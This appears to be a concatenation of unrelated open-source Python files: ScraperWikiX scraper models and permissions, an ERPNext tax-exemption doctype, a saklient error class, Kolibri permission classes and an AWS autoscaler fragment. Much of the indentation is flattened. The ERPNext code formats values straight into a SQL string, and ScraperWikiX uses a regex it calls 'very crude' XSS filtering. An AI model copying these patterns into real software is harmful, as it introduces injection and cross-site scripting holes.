LANGUAGES = [ (k,v) for k,v in LANGUAGES_DICT.iteritems() ]
# used for new scraper/view dialogs
# Add "javascript" to enable Javascript
SCRAPER_LANGUAGES = [ (k, LANGUAGES_DICT[k]) for k in ["python", "ruby", "php" ] ]
SCRAPER_LANGUAGES_V = [ '2.7.1', '1.9.2', '5.3.5', '']
VIEW_LANGUAGES = [ (k, LANGUAGES_DICT[k]) for k in ["python", "ruby", "php", "html"] ]
HELP_LANGUAGES = [ (k, LANGUAGES_DICT[k]) for k in ["python", "ruby", "php"] ]
WIKI_TYPES = (
('scraper', 'Scraper'),
('view', 'View'),
)
PRIVACY_STATUSES = (
('public', 'Public'),
('visible', 'Visible'),
('private', 'Private'),
('deleted', 'Deleted'),
)
STAFF_ACTIONS = set(["run_scraper"])
CREATOR_ACTIONS = set(["delete_data", "undo_delete_data","schedule_scraper", "delete_scraper", "killrunning", "set_privacy_status", "schedulescraper", "set_controleditors" ])
EDITOR_ACTIONS = set(["changeadmin", "savecode", "settags", "stimulate_run", "remove_self_editor", "change_attachables", "attachable_add", "getrawdescription"])
STAFF_EXTRA_ACTIONS = CREATOR_ACTIONS | EDITOR_ACTIONS - set(['savecode']) # let staff also do anything a creator / editor can, except save code is a bit rude (for now!)
VISIBLE_ACTIONS = set(["rpcexecute", "readcode", "readcodeineditor", "overview", "history", "exportsqlite", "setfollow" ])
MAGIC_RUN_INTERVAL = 1000000000
def scraper_search_query_unordered(user, query, apikey=None):
if query:
scrapers = Code.objects.filter(title__icontains=query)
scrapers_description = Code.objects.filter(description__icontains=query)
scrapers_slug = Code.objects.filter(short_name__icontains=query)
scrapers_all = scrapers | scrapers_description | scrapers_slug
else:
scrapers_all = Code.objects
scrapers_all = scrapers_all.exclude(privacy_status="deleted")
u = user
if apikey:
# If we have an API key then we should look up the userprofile and
# use that user instead of the one supplied
try:
u = UserProfile.objects.get(apikey=apikey).user
except UserProfile.DoesNotExist:
u = None
if u and not u.is_anonymous():
scrapers_all = scrapers_all.exclude(Q(privacy_status="private") & ~(Q(usercoderole__user=u) & Q(usercoderole__role='owner')) & ~(Q(usercoderole__user=u) & Q(usercoderole__role='editor')))
else:
scrapers_all = scrapers_all.exclude(privacy_status="private")
return scrapers_all
def scraper_search_query(user, query, apikey=None):
    scrapers_all = scraper_search_query_unordered(user, query, apikey=apikey)
scrapers_all = scrapers_all.order_by('-created_at')
return scrapers_all.distinct()
def user_search_query(user, query, apikey=None):
users_name = User.objects.filter(userprofile__name__icontains=query)
users_bio = User.objects.filter(userprofile__bio__icontains=query)
users_username = User.objects.filter(username__icontains=query)
users_all = users_name | users_bio | users_username
users_all.order_by('-created_at')
return users_all.distinct()
class Code(models.Model):
# model fields
title = models.CharField(max_length=100,
null=False,
blank=False,
verbose_name='Scraper Title',
default='Untitled')
short_name = models.CharField(max_length=50, unique=True)
description = models.TextField(blank=True)
created_at = models.DateTimeField(auto_now_add=True)
status = models.CharField(max_length=10, blank=True, default='ok') # "sick", "ok"
users = models.ManyToManyField(User, through='UserCodeRole')
guid = models.CharField(max_length=1000)
line_count = models.IntegerField(default=0)
featured = models.BooleanField(default=False)
istutorial = models.BooleanField(default=False)
language = models.CharField(max_length=32, choices=LANGUAGES, default='python')
wiki_type = models.CharField(max_length=32, choices=WIKI_TYPES, default='scraper')
    relations = models.ManyToManyField("self", blank=True) # manage.py refuses to generate the table for this, so you have to do it manually.
forked_from = models.ForeignKey('self', null=True, blank=True)
privacy_status = models.CharField(max_length=32, choices=PRIVACY_STATUSES, default='public')
previous_privacy = models.CharField(max_length=32, choices=PRIVACY_STATUSES, null=True, blank=True)
has_screen_shot = models.BooleanField( default=False )
# For private scrapers this can be provided to API calls as proof that the caller has access
# to the scraper, it is really a shared secret between us and the caller. For the datastore
# API call it will only be used to verify access to the main DB, not the attached as that is
# done through the existing code permissions model.
# This should be regeneratable on demand by any editor/owner of the scraper (if it is private)
access_apikey = models.CharField(max_length=64, blank=True, null=True)
def __init__(self, *args, **kwargs):
super(Code, self).__init__(*args, **kwargs)
if not self.created_at:
self.created_at = datetime.datetime.today()
def save(self, *args, **kwargs):
# Check type and apikey and generate one if necessary
if self.privacy_status == "private" and not self.access_apikey:
self.generate_apikey()
if not self.short_name:
self._buildfromfirsttitle()
if not self.guid:
self.set_guid()
super(Code, self).save(*args, **kwargs)
def __unicode__(self):
return self.short_name
@property
def vcs(self):
return vc.MercurialInterface(self.get_repo_path())
def commit_code(self, code_text, commit_message, user):
self.vcs.savecode(code_text, "code")
rev = self.vcs.commit(message=commit_message, user=user)
return rev
def set_docs(self, description, user):
self.description = description
self.vcs.savecode(description, "docs")
rev = self.vcs.commit(message="save docs", user=user)
def generate_apikey(self):
import uuid
self.access_apikey = str( uuid.uuid4() )
def get_commit_log(self, filename):
return self.vcs.getcommitlog(filename)
def get_file_status(self):
return self.vcs.getfilestatus("code")
# this is hardcoded to get revision list for "code"
def get_vcs_status(self, revision = None):
return self.vcs.getstatus(revision)
def get_reversion(self, rev):
return self.vcs.getreversion(rev)
def _buildfromfirsttitle(self):
assert not self.short_name
self.short_name = util.SlugifyUniquely(self.title, Code, slugfield='short_name', instance=self)
assert self.short_name != ''
def last_runevent(self):
lscraperrunevents = self.scraper.scraperrunevent_set.all().order_by("-run_started")[:1]
return lscraperrunevents and lscraperrunevents[0] or None
def is_sick_and_not_running(self):
if self.status == 'sick':
return True
return False
def set_guid(self):
self.guid = hashlib.md5("%s" % ("**@@@".join([self.short_name, str(time.mktime(self.created_at.timetuple()))]))).hexdigest()
# it would be handy to get rid of this function
def owner(self):
if self.pk:
owner = self.users.filter(usercoderole__role='owner')
if len(owner) >= 1:
return owner[0]
return None
def editors(self):
if self.pk:
return self.users.filter(usercoderole__role='editor')
return None
def attachable_scraperdatabases(self):
try:
return [ cp.permitted_object for cp in CodePermission.objects.filter(code=self).all() if cp.permitted_object.privacy_status != "deleted" ]
except:
return []
# could filter for the private scrapers which this user is allowed to see!
def attachfrom_scrapers(self):
        return [ cp.code for cp in CodePermission.objects.filter(permitted_object=self).all() if cp.code.privacy_status not in ["deleted", "private"] ]
def add_user_role(self, user, role='owner'):
"""
Method to add a user as either an editor or an owner to a scraper/view.
- `user`: a django.contrib.auth.User object
- `role`: String, either 'owner' or 'editor'
        Valid roles are:
* "owner"
* "editor"
* "follow"
* "requester"
* "email"
"""
valid_roles = ['owner', 'editor', 'follow', 'requester', 'email']
if role not in valid_roles:
raise ValueError("""
%s is not a valid role. Valid roles are:\n
%s
""" % (role, ", ".join(valid_roles)))
#check if role exists before adding
u, created = UserCodeRole.objects.get_or_create(user=user,
code=self,
role=role)
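    # Illustrative usage (a hypothetical sketch, assuming an existing Code instance
    # `scraper` and a django.contrib.auth User `user`):
    #
    #     scraper.add_user_role(user, role='editor')            # grant edit rights
    #     scraper.set_user_role(user, 'follow')                 # follow without editing
    #     scraper.set_user_role(user, 'editor', remove=True)    # revoke the editor role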
# should eventually replace add_user_role
# knows what roles are redundant to each other
def set_user_role(self, user, role, remove=False):
assert role in ['owner', 'editor', 'follow'] # for now
userroles = UserCodeRole.objects.filter(code=self, user=user)
euserrole = None
for userrole in userroles:
if userrole.role == role:
if remove:
userrole.delete()
else:
euserrole = userrole
elif userrole.role in ['owner', 'editor', 'follow'] and role in ['owner', 'editor', 'follow']:
userrole.delete()
if not euserrole and not remove:
euserrole = UserCodeRole(code=self, user=user, role=role)
euserrole.save()
return euserrole
# uses lists of users rather than userroles so that you can test containment easily
def userrolemap(self):
result = { "editor":[], "owner":[]}
for usercoderole in self.usercoderole_set.all():
if usercoderole.role not in result:
result[usercoderole.role] = [ ]
result[usercoderole.role].append(usercoderole.user)
return result
def saved_code(self, revision = None):
return self.get_vcs_status(revision)["code"]
def get_repo_path(self):
if settings.SPLITSCRAPERS_DIR:
return os.path.join(settings.SPLITSCRAPERS_DIR, self.short_name)
# XXX this should either raise an error, or return something, in the case
# where SPLITSCRAPERS_DIR isn't set. no idea if there is some real case
# where that happens
def get_absolute_url(self):
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
current_site = Site.objects.get_current()
r = reverse('code_overview', kwargs={'wiki_type':self.wiki_type, 'short_name':self.short_name})
url = 'https://%s%s' % (current_site.domain,r,)
return url
# update scraper meta data (lines of code etc)
def update_meta(self):
pass
# this is just to handle the general pointer put into Alerts
def content_type(self):
return ContentType.objects.get(app_label="codewiki", model="Code")
def get_screenshot_filename(self, size='medium'):
return "%s.png" % self.short_name
def get_screenshot_filepath(self, size='medium'):
filename = self.get_screenshot_filename(size)
return os.path.join(settings.SCREENSHOT_DIR, size, filename)
def screenshot_url(self, size='medium'):
from django.conf import settings
if self.has_screenshot(size):
url = settings.MEDIA_URL + 'screenshots/' + size + '/' + self.get_screenshot_filename(size=size)
else:
url = settings.MEDIA_URL + 'images/testcard_' + size + '.png'
return url
def has_screenshot(self, size='medium'):
has = os.path.exists(self.get_screenshot_filepath(size))
if has and not self.has_screen_shot:
self.has_screen_shot = True
self.save()
return has
class Meta:
app_label = 'codewiki'
# the only remaining reference to textile
def description_ashtml(self):
cdesc = self.description_safepart()
if re.search("__BEGIN", self.description):
envvars = self.description_envvars()
nqsenvvars = len(re.findall("=", envvars.get("QUERY_STRING", "")))
if nqsenvvars:
cdesc = "%s\n\n_Has %d secret query-string environment variable%s._" % (cdesc, nqsenvvars, (nqsenvvars>1 and "s" or ""))
# Doing some very crude XSS protection
cdesc = re.sub("<(\s*script)(?i)", "<\\1", cdesc)
if not re.search("<", cdesc):
text = textile.textile(cdesc) # wikicreole at the very least here!!!
text = text.replace("“", '"')
text = text.replace("”", '"')
text = text.replace("’", "'")
else:
text = cdesc
return text
def description_safepart(self): # used in the api output
cdesc = re.sub('(?s)__BEGIN_QSENVVARS__.*?__END_QSENVVARS__', '', self.description)
cdesc = re.sub('(?s)__BEGIN_ENVVARS__.*?__END_ENVVARS__', '', cdesc)
return cdesc
# You can encode the query string as individual elements, or as one block.
# If controller/node can drop in environment variables directly, then we can consider a general purpose adding of
# such environment variables not through the QUERY_STRING interface which requires decoding in the scraper.
# Would be more traditional to obtain the values as os.getenv("TWITTER_API_KEY") than dict(cgi.parse_qsl(os.getenv("QUERY_STRING")))["TWITTER_API_KEY"]
def description_envvars(self):
qsenvvars = { }
for lines in re.findall('(?s)__BEGIN_QSENVVARS__(.*?)__END_QSENVVARS__', self.description):
for line in lines.split("\n"):
sline = line.strip()
if sline:
psline = sline.partition("=")
qsenvvars[psline[0].strip()] = psline[2].strip()
envvars = { }
if qsenvvars:
envvars["QUERY_STRING"] = urllib.urlencode(qsenvvars)
for lines in re.findall('(?s)__BEGIN_ENVVARS__(.*?)__END_ENVVARS__', self.description):
for line in lines.split("\n"):
sline = line.strip()
if sline:
psline = sline.partition("=")
                    envvars[psline[0].strip()] = psline[2].strip()
return envvars
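    # Illustrative sketch (the key and value are made-up examples): a description
    # containing the block
    #
    #     __BEGIN_QSENVVARS__
    #     TWITTER_API_KEY = abc123
    #     __END_QSENVVARS__
    #
    # yields {'QUERY_STRING': 'TWITTER_API_KEY=abc123'}, which scraper code can decode
    # with dict(cgi.parse_qsl(os.getenv("QUERY_STRING")))["TWITTER_API_KEY"].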
# all authorization to go through here
def actionauthorized(self, user, action):
if user and not user.is_anonymous():
roles = [ usercoderole.role for usercoderole in UserCodeRole.objects.filter(code=self, user=user) ]
else:
roles = [ ]
#print "Code.actionauthorized AUTH", (action, user, roles, self.privacy_status)
# roles are: "owner", "editor", "follow", "requester", "email"
# privacy_status: "public", "visible", "private", "deleted"
if self.privacy_status == "deleted":
return False
# extra type control condition
if action == "rpcexecute" and self.wiki_type != "view":
return False
if action in STAFF_ACTIONS:
return user.is_staff
if user.is_staff and action in STAFF_EXTRA_ACTIONS:
return True
if action in CREATOR_ACTIONS:
return "owner" in roles
if action in EDITOR_ACTIONS:
if self.privacy_status == "public":
return user.is_authenticated()
return "editor" in roles or "owner" in roles
if action in VISIBLE_ACTIONS:
if self.privacy_status == "private":
return "editor" in roles or "owner" in roles
return True
assert False, ("unknown action", action)
return True
def authorizationfailedmessage(self, user, action):
if self.privacy_status == "deleted":
            return {'heading': 'Deleted', 'body': "Sorry, this %s has been deleted" % self.wiki_type}
if action == "rpcexecute" and self.wiki_type != "view":
return {'heading': 'This is a scraper', 'body': "Not supposed to run a scraper as a view"}
if action in STAFF_ACTIONS:
return {'heading': 'Not authorized', 'body': "Only staff can do action %s" % action}
if action in CREATOR_ACTIONS:
return {'heading': 'Not authorized', 'body': "Only owner can do action %s" % action}
if action in EDITOR_ACTIONS:
if self.privacy_status != "public":
return {'heading': 'Not authorized', 'body': "This %s can only be edited by its owner and designated editors" % self.wiki_type}
if not user.is_authenticated():
return {'heading': 'Not authorized', 'body': "Only logged in users can edit things"}
if action in VISIBLE_ACTIONS:
if self.privacy_status == "private":
return {'heading': 'Not authorized', 'body': "Sorry, this %s is private" % self.wiki_type}
return {'heading': "unknown", "body":"unknown"}
def api_actionauthorized(self, apikey):
if self.privacy_status == 'private':
return all([ self.access_apikey, apikey, self.access_apikey == apikey ])
return True
# tags have been unhelpfully attached to the scraper and view classes rather than the base code class
# we can minimize the damage caused by this decision (in terms of forcing the scraper/view code to be
# unnecessarily separate) by filtering as much of this application as possible through this interface
def gettags(self):
if self.wiki_type == "scraper":
return tagging.models.Tag.objects.get_for_object(self.scraper)
return tagging.models.Tag.objects.get_for_object(self.view)
def settags(self, tag_names):
if self.wiki_type == "scraper":
tagging.models.Tag.objects.update_tags(self.scraper, tag_names)
else:
tagging.models.Tag.objects.update_tags(self.view, tag_names)
# is the automatically made, builtin emailer
def is_emailer(self):
return self.short_name[-8:] == '.emailer'
# I think this is another of those things that could be saved into the mercurial docs field
# (as a query_string itself) so we can use the history and editing permissions all there.
# would considerably simplify the situation
class CodeSetting(models.Model):
"""
A single key=value setting for a scraper/view that is editable for that
view/scraper by the owner (or editor). There will be several (potentially)
of these per scraper/view that are only visible to owners and editors where
the scraper/view is private/protected.
It is passed through the system with the code when executed and so will
be available within the scraper code via an internal api setting - such
as scraperwiki.setting('name')
Records the user who last saved the setting (and when) so that there is
a minimal amount of auditing available.
"""
code = models.ForeignKey(Code, related_name='settings')
key = models.CharField(max_length=100)
value = models.TextField()
last_edited = models.ForeignKey(User)
last_edit_date = models.DateTimeField(auto_now=True)
def __unicode__(self):
return repr(self)
def __repr__(self):
return '<CodeSetting: %s for %s>' % (self.key, self.code.short_name,)
class Meta:
app_label = 'codewiki'
class CodePermission(models.Model):
"""
A uni-directional permission to read/write to a particular scraper/view
for another scraper/view.
"""
code = models.ForeignKey(Code, related_name='permissions')
    permitted_object = models.ForeignKey(Code, related_name='permitted') # should be called permitted_code so we don't assume it is untyped
def __unicode__(self):
return u'%s CANATTACHTO %s' % (self.code.short_name, self.permitted_object.short_name,)
class Meta:
app_label = 'codewiki'
class UserCodeRole(models.Model):
user = models.ForeignKey(User)
code = models.ForeignKey(Code)
role = models.CharField(max_length=100) # ['owner', 'editor', 'follow', 'requester', 'email']
def __unicode__(self):
return "Scraper_id: %s -> User: %s (%s)" % (self.code, self.user, self.role)
class Meta:
app_label = 'codewiki'
class UserUserRole(models.Model):
pass
| rossjones/ScraperWikiX | web/codewiki/models/code.py | Python | agpl-3.0 | 21,938 |
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe import _
from frappe.utils import date_diff, flt
from erpnext.hr.utils import validate_tax_declaration, calculate_eligible_hra_exemption
class EmployeeTaxExemptionProofSubmission(Document):
def validate(self):
validate_tax_declaration(self.tax_exemption_proofs)
if self.house_rent_payment_amount:
self.validate_house_rent_dates()
self.get_monthly_hra()
self.calculate_hra_exemption()
self.calculate_total_exemption()
def get_monthly_hra(self):
factor = self.get_rented_days_factor()
self.monthly_house_rent = self.house_rent_payment_amount / factor
def validate_house_rent_dates(self):
if date_diff(self.rented_to_date, self.rented_from_date) < 14:
frappe.throw(_("House Rented dates should be atleast 15 days apart"))
proofs = frappe.db.sql("""select name from `tabEmployee Tax Exemption Proof Submission`
where docstatus=1 and employee='{0}' and payroll_period='{1}' and
(rented_from_date between '{2}' and '{3}' or rented_to_date between
            '{2}' and '{3}')""".format(self.employee, self.payroll_period,
self.rented_from_date, self.rented_to_date))
if proofs:
frappe.throw(_("House rent paid days overlap with {0}").format(proofs[0][0]))
def calculate_hra_exemption(self):
exemptions = calculate_eligible_hra_exemption(self.company, self.employee, \
self.monthly_house_rent, self.rented_in_metro_city)
self.monthly_hra_exemption = exemptions["monthly_exemption"]
if self.monthly_hra_exemption:
factor = self.get_rented_days_factor(rounded=False)
self.total_eligible_hra_exemption = self.monthly_hra_exemption * factor
else:
self.monthly_hra_exemption, self.total_eligible_hra_exemption = 0, 0
def get_rented_days_factor(self, rounded=True):
factor = flt(date_diff(self.rented_to_date, self.rented_from_date) + 1)/30
factor = round(factor * 2)/2
return factor if factor else 0.5
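    # Worked example (numbers are hypothetical): 45 rented days give
    # factor = round((45/30) * 2) / 2 = 1.5, so a payment of 30000 over that period
    # implies monthly_house_rent = 30000 / 1.5 = 20000.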
def calculate_total_exemption(self):
self.total_amount = 0
for proof in self.tax_exemption_proofs:
self.total_amount += proof.amount
if self.monthly_house_rent and self.total_eligible_hra_exemption:
self.total_amount += self.total_eligible_hra_exemption
| manassolanki/erpnext | erpnext/hr/doctype/employee_tax_exemption_proof_submission/employee_tax_exemption_proof_submission.py | Python | gpl-3.0 | 2,380 |
# -*- coding:utf-8 -*-
# This code is automatically transpiled by Saklient Translator
import six
from ...errors.httpbadrequestexception import HttpBadRequestException
import saklient
str = six.text_type
# module saklient.cloud.errors.invalidformatexception
class InvalidFormatException(HttpBadRequestException):
    ## Invalid request: the format of one or more of the parameter values is incorrect.
## @param {int} status
# @param {str} code=None
# @param {str} message=""
def __init__(self, status, code=None, message=""):
super(InvalidFormatException, self).__init__(status, code, "不適切な要求です。パラメータに含まれている値のフォーマットが一部不正です。" if message is None or message == "" else message)
| sakura-internet/saklient.python | saklient/cloud/errors/invalidformatexception.py | Python | mit | 817 |
"""
This module defines the base classes for Kolibri's class-based Permissions system.
"""
from django.db.models import F
####################################################################################################################
# This section contains base classes that can be inherited and extended to define more complex permissions behavior.
####################################################################################################################
class BasePermissions(object):
"""
Base Permission class from which all other Permission classes should inherit.
The following methods should be overridden in child classes:
- The following four Boolean (True/False) permission checks, corresponding to the "CRUD" operations:
- `user_can_create_object`
- `user_can_read_object`
- `user_can_update_object`
- `user_can_delete_object`
- The queryset-filtering `readable_by_user_filter` method, which takes in a queryset and returns a queryset
filtered down to just objects that should be readable by the user.
"""
def user_can_create_object(self, user, obj):
"""Returns True if this permission class grants <user> permission to create the provided <obj>.
Note that the object may not yet have been saved to the database (as this may be a pre-save check)."""
raise NotImplementedError(
"Override `user_can_create_object` in your permission class before you use it."
)
def user_can_read_object(self, user, obj):
"""Returns True if this permission class grants <user> permission to read the provided <obj>."""
raise NotImplementedError(
"Override `user_can_read_object` in your permission class before you use it."
)
def user_can_update_object(self, user, obj):
"""Returns True if this permission class grants <user> permission to update the provided <obj>."""
raise NotImplementedError(
"Override `user_can_update_object` in your permission class before you use it."
)
def user_can_delete_object(self, user, obj):
"""Returns True if this permission class grants <user> permission to delete the provided <obj>."""
raise NotImplementedError(
"Override `user_can_delete_object` in your permission class before you use it."
)
def readable_by_user_filter(self, user, queryset):
"""Applies a filter to the provided queryset, only returning items for which the user has read permission."""
raise NotImplementedError(
"Override `readable_by_user_filter` in your permission class before you use it."
)
def __or__(self, other):
"""
Allow two instances of BasePermission to be joined together with "|", which returns a permissions class
that grants permission for an object when *either* of the instances would grant permission for that object.
"""
return PermissionsFromAny(self, other)
def __and__(self, other):
"""
Allow two instances of BasePermission to be joined together with "&", which returns a permissions class
that grants permission for an object when *both* of the instances grant permission for that object.
"""
return PermissionsFromAll(self, other)
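# A minimal usage sketch (PermA and PermB are placeholder names for any concrete
# BasePermissions subclasses, not classes defined in this module):
#
#     permissions = PermA() | PermB()   # access if either grants it (PermissionsFromAny)
#     permissions = PermA() & PermB()   # access only if both grant it (PermissionsFromAll)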
class RoleBasedPermissions(BasePermissions):
"""
Permissions class that defines a requesting user's permissions in terms of his or her kinds of roles with respect
to a User or Collection that is related to the object.
"""
def __init__(
self,
target_field,
can_be_created_by,
can_be_read_by,
can_be_updated_by,
can_be_deleted_by,
):
"""
:param str target_field: the name of the field through which the role target (user or collection) will be referenced
(or "." if the object itself is the target). The referenced field should be a ``ForeignKey`` either to a
``FacilityUser`` or a ``Collection`` model.
:param tuple can_be_created_by: a tuple of role kinds that should give a user permission to create the object
:param tuple can_be_read_by: a tuple of role kinds that should give a user permission to read the object
:param tuple can_be_updated_by: a tuple of role kinds that should give a user permission to update the object
:param tuple can_be_deleted_by: a tuple of role kinds that should give a user permission to delete the object
"""
self.can_be_created_by = can_be_created_by
self.can_be_read_by = can_be_read_by
self.can_be_updated_by = can_be_updated_by
self.can_be_deleted_by = can_be_deleted_by
self.target_field = target_field
def _get_target_object(self, obj):
if self.target_field == ".": # this means the object itself is the target
return obj
else: # otherwise, do the lookup based on the provided field name, and fetch the target object
# TODO(jamalex): allow related object lookups (e.g. "classroom__parent"), rather than just direct FK's
return getattr(obj, self.target_field)
def user_can_create_object(self, user, obj):
roles = getattr(self, "can_be_created_by", None)
assert isinstance(
roles, tuple
), "If `can_be_created_by` is None, then `user_can_create_object` method must be overridden with custom behavior."
target_object = self._get_target_object(obj)
return user.has_role_for(roles, target_object)
def user_can_read_object(self, user, obj):
roles = getattr(self, "can_be_read_by", None)
assert isinstance(
roles, tuple
), "If `can_be_read_by` is None, then `user_can_read_object` method must be overridden with custom behavior."
target_object = self._get_target_object(obj)
return user.has_role_for(roles, target_object)
def user_can_update_object(self, user, obj):
roles = getattr(self, "can_be_updated_by", None)
assert isinstance(
roles, tuple
), "If `can_be_updated_by` is None, then `user_can_update_object` method must be overridden with custom behavior."
target_object = self._get_target_object(obj)
return user.has_role_for(roles, target_object)
def user_can_delete_object(self, user, obj):
roles = getattr(self, "can_be_deleted_by", None)
assert isinstance(
roles, tuple
), "If `can_be_deleted_by` is None, then `user_can_delete_object` method must be overridden with custom behavior."
target_object = self._get_target_object(obj)
return user.has_role_for(roles, target_object)
def readable_by_user_filter(self, user, queryset):
# import here to prevent circular dependencies
from ..models import Collection
from ..filters import HierarchyRelationsFilter
if user.is_anonymous():
return queryset.none()
query = {"source_user": user, "role_kind": self.can_be_read_by}
if self.target_field == ".":
if issubclass(queryset.model, Collection):
query["descendant_collection"] = F("id")
else:
query["target_user"] = F("id")
else:
related_model = queryset.model._meta.get_field(
self.target_field
).remote_field.model
if issubclass(related_model, Collection):
query["descendant_collection"] = F(self.target_field)
else:
query["target_user"] = F(self.target_field)
return HierarchyRelationsFilter(queryset).filter_by_hierarchy(**query)
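# A hedged example of attaching RoleBasedPermissions to a model; the model, field and
# role-kind names below are illustrative assumptions rather than code from this package:
#
#     from kolibri.core.auth.constants import role_kinds
#
#     class ExamLog(models.Model):
#         user = models.ForeignKey(FacilityUser)
#         permissions = RoleBasedPermissions(
#             target_field="user",
#             can_be_created_by=(role_kinds.ADMIN, role_kinds.COACH),
#             can_be_read_by=(role_kinds.ADMIN, role_kinds.COACH),
#             can_be_updated_by=(role_kinds.ADMIN, role_kinds.COACH),
#             can_be_deleted_by=(role_kinds.ADMIN,),
#         )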
####################################################################################################################
# This section contains Boolean permissions classes that allow multiple permissions classes to be joined together.
####################################################################################################################
class PermissionsFromAny(BasePermissions):
"""
Serves as an "OR" operator for Permission classes; pass in a number of Permission classes,
and the permission-checking methods on the PermissionsFromAny instance will return True if
any of the Permission classes passed in (the "children" permissions) return True.
"""
def __init__(self, *perms):
self.perms = []
for perm in perms:
# ensure that perm is an instance of a subclass of BasePermissions
assert isinstance(
perm, BasePermissions
), "each of the arguments to __init__ must be a subclass (or instance of a subclass) of BasePermissions"
# add it into the children permissions list
self.perms.append(perm)
def _permissions_from_any(self, user, obj, method_name):
"""
Private helper method to do the corresponding method calls on children permissions instances,
and succeed as soon as one of them succeeds, or fail if none of them do.
"""
for perm in self.perms:
if getattr(perm, method_name)(user, obj):
return True
return False
def user_can_create_object(self, user, obj):
return self._permissions_from_any(user, obj, "user_can_create_object")
def user_can_read_object(self, user, obj):
return self._permissions_from_any(user, obj, "user_can_read_object")
def user_can_update_object(self, user, obj):
return self._permissions_from_any(user, obj, "user_can_update_object")
def user_can_delete_object(self, user, obj):
return self._permissions_from_any(user, obj, "user_can_delete_object")
def readable_by_user_filter(self, user, queryset):
# call each of the children permissions instances in turn, performing an "OR" on the querysets
union_queryset = queryset.none()
for perm in self.perms:
union_queryset = union_queryset | perm.readable_by_user_filter(
user, queryset
)
return union_queryset
class PermissionsFromAll(BasePermissions):
"""
Serves as an "AND" operator for Permission classes; pass in a number of Permission classes,
and the permission-checking methods on the PermissionsFromAll instance will return True only if
all of the Permission classes passed in (the "children" permissions) return True.
"""
def __init__(self, *perms):
self.perms = []
for perm in perms:
# ensure that perm is an instance of a subclass of BasePermissions
assert isinstance(
perm, BasePermissions
), "each of the arguments to __init__ must be a subclass (or instance of a subclass) of BasePermissions"
# add it into the children permissions list
self.perms.append(perm)
def _permissions_from_all(self, user, obj, method_name):
"""
Private helper method to do the corresponding method calls on children permissions instances,
and fail as soon as one of them fails, or succeed if all of them succeed.
"""
for perm in self.perms:
if not getattr(perm, method_name)(user, obj):
return False
return True
def user_can_create_object(self, user, obj):
return self._permissions_from_all(user, obj, "user_can_create_object")
def user_can_read_object(self, user, obj):
return self._permissions_from_all(user, obj, "user_can_read_object")
def user_can_update_object(self, user, obj):
return self._permissions_from_all(user, obj, "user_can_update_object")
def user_can_delete_object(self, user, obj):
return self._permissions_from_all(user, obj, "user_can_delete_object")
def readable_by_user_filter(self, user, queryset):
# call each of the children permissions instances in turn, iteratively filtering down the queryset
for perm in self.perms:
queryset = perm.readable_by_user_filter(user, queryset)
return queryset
# helper functions
def lookup_field_with_fks(field_ref, obj):
for key in field_ref.split("__"):
obj = getattr(obj, key)
return obj
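# Illustrative behaviour (hypothetical object): lookup_field_with_fks("classroom__parent", obj)
# follows one attribute per "__"-separated segment and is equivalent to obj.classroom.parent.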
| lyw07/kolibri | kolibri/core/auth/permissions/base.py | Python | mit | 12,304 |
import datetime
import logging
import re
from concurrent.futures import ThreadPoolExecutor
import botocore
import pytz
import autoscaler.aws_utils as aws_utils
import autoscaler.utils as utils
logger = logging.getLogger(__name__)
class AutoScalingGroups(object):
_BOTO_CLIENT_TYPE = 'autoscaling'
_CLUSTER_KEY = 'KubernetesCluster'
_ROLE_KEYS = ('KubernetesRole', 'Role')
_WORKER_ROLE_VALUES = ('worker', 'kubernetes-minion')
def __init__(self, session, regions, cluster_name=None):
"""
cluster_name - if set, filter ASGs by cluster_name in tag field
_CLUSTER_KEY
"""
self.session = session
self.regions = regions
self.cluster_name = cluster_name
@staticmethod
def get_all_raw_groups_and_launch_configs(client):
raw_groups = aws_utils.fetch_all(
client.describe_auto_scaling_groups, {'MaxRecords': 100}, 'AutoScalingGroups')
all_launch_configs = {}
batch_size = 50
for launch_config_idx in range(0, len(raw_groups), batch_size):
            groups = raw_groups[launch_config_idx:launch_config_idx + batch_size]
kwargs = {
'LaunchConfigurationNames': [g['LaunchConfigurationName'] for g in groups]
}
launch_configs = aws_utils.fetch_all(
client.describe_launch_configurations,
kwargs, 'LaunchConfigurations')
all_launch_configs.update((lc['LaunchConfigurationName'], lc)
for lc in launch_configs)
return raw_groups, all_launch_configs
def get_all_groups(self, kube_nodes):
groups = []
with ThreadPoolExecutor(max_workers=max(1, len(self.regions))) as executor:
raw_groups_and_launch_configs = {}
for region in self.regions:
client = self.session.client(self._BOTO_CLIENT_TYPE,
region_name=region)
raw_groups_and_launch_configs[region] = executor.submit(
AutoScalingGroups.get_all_raw_groups_and_launch_configs, client)
for region in self.regions:
raw_groups, launch_configs = raw_groups_and_launch_configs[region].result()
client = self.session.client(self._BOTO_CLIENT_TYPE,
region_name=region)
for raw_group in sorted(raw_groups, key=lambda g: g['AutoScalingGroupName']):
if self.cluster_name:
cluster_name = None
role = None
for tag in raw_group['Tags']:
if tag['Key'] == self._CLUSTER_KEY:
cluster_name = tag['Value']
elif tag['Key'] in self._ROLE_KEYS:
role = tag['Value']
if cluster_name != self.cluster_name or role not in self._WORKER_ROLE_VALUES:
continue
groups.append(AutoScalingGroup(
client, region, kube_nodes, raw_group,
launch_configs[raw_group['LaunchConfigurationName']]))
return groups
class AutoScalingTimeouts(object):
_TIMEOUT = 3600 # 1 hour
_SPOT_REQUEST_TIMEOUT = 300 # 5 minutes
_MAX_OUTBIDS_IN_INTERVAL = 60*20 # 20 minutes
_SPOT_HISTORY_PERIOD = 60*60*5 # 5 hours
def __init__(self, session):
"""
"""
self.session = session
# ASGs to avoid because of recent launch failures
# e.g. a region running out of capacity
# try to favor other regions
self._timeouts = {}
self._last_activities = {}
# ASGs to avoid because of spot pricing history
self._spot_timeouts = {}
self._spot_price_history = {}
def refresh_timeouts(self, asgs, dry_run=False):
"""
refresh timeouts on ASGs using new data from aws
"""
self.time_out_spot_asgs(asgs)
asgs_by_region = {}
for asg in asgs:
asgs_by_region.setdefault(asg.region, []).append(asg)
for region, regional_asgs in asgs_by_region.items():
client = self.session.client('autoscaling', region_name=region)
start_time_cutoff = None
newest_completed_activity = None
activities = {}
for activity in self.iter_activities(client):
if newest_completed_activity is None and activity['Progress'] == 100:
newest_completed_activity = activity
if activity['ActivityId'] == self._last_activities.get(region, None):
break
if start_time_cutoff is None:
start_time_cutoff = (
datetime.datetime.now(activity['StartTime'].tzinfo) -
